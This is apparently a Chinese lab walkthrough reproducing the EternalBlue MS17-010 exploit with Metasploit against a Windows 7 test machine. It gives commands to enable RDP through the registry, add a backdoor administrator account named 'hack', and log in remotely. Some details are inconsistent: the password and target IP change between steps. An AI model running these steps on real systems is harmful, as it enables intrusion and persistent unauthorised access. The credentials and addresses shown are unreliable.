永恒之蓝MS17-010漏洞复现
实验目的
利用永恒之蓝漏洞获取靶机控制权限并打开3389实现远程连接
实验环境
攻击机:kali(192.168.92.20) 靶机:win7 (192.168.92.31)
实验准备
关闭靶机防火墙
查看靶机445、139端口开放情况
开始攻击
使用kali内置msf查询攻击模块
使用该模块查询靶机是否存在漏洞
auxiliary/scanner/smb/smb_ms17_010
然后使用该模块进行攻击
exploit/windows/smb/ms17_010_eternalblue
尝试对靶机截图
meterpreter > screenshot
成功拿到靶机权限
进入靶机shell
解决shell命令返回乱码问题
chcp 65001
接下来利用拿到权限开启靶机3389端口
使用命令打开靶机3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
查询3389端口状态
netstat -ano|findstr "3389"
使用命令添加用户
net user hack 123123 /add
将所添加用户添加到管理员组
net localgroup administrators hack /add
使用命令远程连接
rdesktop -u hack -p 123456
或者
xfreerdp /u:hack /p:123456 /v:192.168.16.46
连接成功
注意:在使用rdesktop出现如下错误
或使用xfreerdp出现
输入
export DISPLAY=:0
或
export DISPLAY=:1
即可